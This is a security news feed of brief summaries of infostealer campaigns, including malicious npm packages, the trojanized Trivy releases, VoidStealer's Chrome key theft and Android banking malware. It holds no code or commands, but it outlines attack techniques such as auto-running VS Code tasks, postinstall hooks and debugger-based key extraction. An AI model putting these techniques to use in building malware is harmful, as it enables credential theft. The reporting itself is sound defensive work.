All news with #infostealer tag

🔍 Security researchers at ReversingLabs uncovered a malicious npm campaign, dubbed the 'Ghost campaign', that uses fabricated installation logs to conceal downloader behavior. Malicious packages impersonate legitimate installs—displaying fake dependency downloads, progress bars and random delays—and prompt users for their sudo password under false pretenses. That credential is then used to fetch and execute a final-stage remote access trojan capable of stealing crypto wallets and sensitive data; researchers advise verifying package authors, monitoring install scripts and avoiding sudo prompts during installs.

🛡️Security researchers at ReversingLabs have uncovered a set of malicious npm packages published by user mikilanjillo that phish for sudo credentials and deploy a multi-stage downloader to steal cryptocurrency wallets and other sensitive data. The packages display fake npm install logs and inject delays to mask their actions, then prompt for elevated privileges to retrieve a remote payload via Telegram. The final stage installs a remote access trojan capable of harvesting browser credentials, wallets, SSH keys, and developer tokens.

🔐 NTT Security warns of a newly disclosed malware strain called StoatWaffle that automatically executes when developers open and trust weaponized Visual Studio Code folders. The threat leverages a crafted .vscode/tasks.json with a runOn: folderOpen setting to trigger a Node.js-based loader, credential stealer and RAT without explicit user action. Operators attributed to WaterPlum are evolving the long-running Contagious Interview campaign to target developer workflows and toolchains.

🔔 The TeamPCP threat actor extended its Trivy supply‑chain attack by pushing malicious Docker images and hijacking Aqua Security's GitHub organization, tampering with multiple repositories. Security researchers and Socket identified Docker Hub images tagged 0.69.5 and 0.69.6 that lack corresponding GitHub releases and contain indicators of compromise linked to the TeamPCP Cloud stealer. Aqua said incomplete token rotation after an earlier incident allowed attackers to reuse credentials, and the company published safe Trivy releases while engaging Sygnia to investigate and remediate.

🛡️ Researchers have identified additional compromised Docker images tied to the Trivy supply‑chain incident after attackers injected credential‑stealing malware into official releases and GitHub Actions. New Docker tags 0.69.5 and 0.69.6 were uploaded on March 22 without matching GitHub releases and contain IOCs linked to the TeamPCP infostealer. Aqua Security confirmed repository tampering and advised teams to treat CI/CD scans as potentially compromised while noting its commercial products appear unaffected.

🔐 Researchers have identified a new infostealer called VoidStealer that bypasses Chrome's Application-Bound Encryption (ABE) to exfiltrate stored passwords, cookies, and tokens. Unlike prior ABE bypasses that relied on code injection or elevated privileges, VoidStealer attaches as a debugger and uses hardware breakpoints to capture the v20_master-key at the precise moment it appears in plaintext. The malware can fall back to injection-based methods but prioritizes the stealthy debugger technique. Defenders should monitor for debugger attachments, unexpected memory reads, and anomalous Chrome process activity.

🔐 The FBI warns that Iranian-linked actors, including Handala and a state-associated Homeland Justice group, are using Telegram as command-and-control infrastructure in Windows malware campaigns. Attackers employ social engineering to install malware that exfiltrates screenshots and files from journalists, dissidents, and opposition groups worldwide. The alert followed the seizure of four clearnet domains and references prior disruptive operations such as Handala's attack on Stryker.

🚨 Researchers uncovered trojanized Trivy images on Docker Hub after a supply-chain compromise that pushed malicious releases to developer environments. The last known clean release is 0.69.3; tags 0.69.4–0.69.6 were removed after analysis linked several images to the TeamPCP infostealer. The incident also affected related GitHub Actions and spawned downstream npm compromises and repository defacements.

🔓 VoidStealer, an information stealer offered as MaaS since mid‑December 2025, uses a debugger-based technique to extract Chrome's v20_master_key directly from memory. The malware starts a suspended, hidden browser process, attaches as a debugger, and waits for the target chrome.dll to load before setting hardware breakpoints on an instruction that references the key. When the breakpoint triggers during startup decryption, VoidStealer reads the register pointer and uses ReadProcessMemory to capture the plaintext key without privilege escalation. Gen Digital reports this is the first infostealer observed in the wild using this approach.

🛡️ The Trivy vulnerability scanner was compromised in a supply-chain attack that injected an infostealer into official releases and GitHub Actions. Researchers attribute the campaign to TeamPCP, which trojanized the trivy binary (v0.69.4) and replaced GitHub Action entrypoints, affecting many trivy-action tags. The malware harvested a broad range of credentials, exfiltrated data to a typosquatted C2, and deployed persistence on infected hosts. Organizations using affected versions should assume full compromise and rotate secrets immediately.

🛡️ The actors behind the Trivy supply-chain compromise are now suspected of seeding a self-propagating worm called CanisterWorm, which uses an ICP canister (Internet Computer blockchain smart contract) as a decentralized dead drop for command-and-control. The chain abuses an npm postinstall hook to drop a Python backdoor and establishes persistence via a masquerading systemd user service that restarts automatically. A new variant harvests local npm tokens during postinstall and launches an automated propagation routine, turning compromised developers and CI pipelines into unwitting distributors.

⚠ The widely used Trivy vulnerability scanner and its official GitHub Actions were backdoored after attackers injected a credential‑stealing payload into official releases, the trivy-action and setup-trivy components, and published binaries. The malware harvests pipeline secrets by reading process memory and searching filesystems for SSH keys, cloud credentials, Kubernetes tokens, Docker configs, and wallets, exfiltrating encrypted data to a typosquatted domain or, failing that, by creating a public repository named tpcp-docs. Researchers say the intrusion followed an earlier compromise and incomplete credential rotation that let attackers regain access via insecure GitHub Actions; victims should rotate secrets immediately and pin Actions to full commit SHAs. Known safe versions include Trivy v0.69.3, trivy-action tag 0.35.0, and setup-trivy 0.2.6.

🔒 The Trivy open-source scanner and its GitHub Actions integrations (aquasecurity/trivy-action and aquasecurity/setup-trivy) were compromised in March 2026 when an attacker force-pushed 75 version tags to point to malicious commits. The injected Python infostealer harvests CI/CD secrets from runners, attempts exfiltration to an attacker-controlled domain, and can stage stolen data using captured PATs if network exfiltration fails. Vendors advise immediate secret rotation, blocking the malicious domain/IP, and pinning Actions to full commit SHAs.

🔒 Apple is urging users on older versions of iOS to update immediately after reporting that web-based exploit kits such as Coruna and DarkSword have been used to deliver data-stealing malware via compromised sites. Apple says devices running the latest releases (iOS 15 through 26) are not affected, and has released targeted patches for legacy hardware. For devices that cannot be updated, Apple recommends specific interim updates and enabling Lockdown Mode to reduce exposure.

📱 Zimperium zLabs reports a global surge in mobile banking malware targeting 1,243 financial brands across 90 countries. The firm analysed 34 active malware families affecting apps with more than three billion downloads and found industrialised campaigns exploiting weak app protections and widespread code sharing. Attacks now intercept authentication codes, hijack live sessions and can take control of devices, undermining traditional backend fraud controls.

🔒 ThreatFabric researchers disclosed a new Android banking malware family named Perseus that enables device takeover and financial fraud through dropper apps promoted on phishing and IPTV sideloading sites. Built on code from Cerberus and Phoenix, Perseus leverages Accessibility-based remote sessions to monitor, interact with, and fully control infected devices. It targets users across Turkey, Italy and other European and Middle Eastern markets, and adds note‑scanning to harvest high-value personal data. Operators can issue remote commands, stream screens, run HVNC sessions, and authorize fraudulent transactions via a command-and-control panel.

🔐 Researchers at ThreatFabric have discovered a new Android malware family called Perseus that scans user note-taking apps to steal passwords, recovery phrases, and financial data. Distributed via sideloaded IPTV-themed apps, Perseus abuses Accessibility Services to gain full remote control, capture screenshots, and deploy overlays and keyloggers. The threat uses a dropper capable of bypassing Android 13+ sideloading restrictions and performs extensive anti-analysis checks before exfiltration. Users are advised to avoid sideloading APKs, keep Play Protect enabled, and install apps only from the Google Play Store.

🔒 Researchers have dismantled the ShieldGuard crypto scam after Okta Threat Intelligence flagged the malicious browser extension in an advisory on March 17. Marketed as a wallet security tool with social promotion and token "airdrop" incentives, the extension instead harvested wallet addresses, scraped full HTML content after logins and tracked users across sessions. It used obfuscation and a custom JavaScript interpreter to evade Chrome protections and supported remote command-and-control execution. Partners removed the extension from the Chrome Web Store, disabled backend infrastructure, took down domains and blocked sign-in functionality; users are advised to limit plugins, verify sources and treat free-token offers with caution.

🔒 Darksword is a newly discovered iOS exploit kit targeting iPhones running iOS 18.4–18.6.2 and used to harvest credentials, photos, messages, and cryptocurrency wallet data. Researchers from Lookout, Google Threat Intelligence Group, and iVerify linked the framework to the actor behind the Coruna chain and say Apple has patched the exploited flaws. Victims should update to iOS 26.3.1 and consider enabling Lockdown Mode if at high risk.

🎮 Acronis TRU found hundreds of GitHub repositories posing as "free" game cheats that deliver the Vidar 2.0 infostealer, warning the true number of malicious repos could be in the thousands. Campaigns begin in game-focused Discord and Reddit communities and use PS2EXE-compiled PowerShell loaders to evade basic detections. Loaders add Windows Defender exclusions, fetch secondary payload URLs from Pastebin linking to GitHub-hosted binaries, and deploy a Themida-packed Vidar executable that establishes persistence via scheduled tasks. The payload then harvests credentials, tokens and files and exfiltrates them through C2 infrastructure masked by Telegram bots and Steam dead-drop resolvers.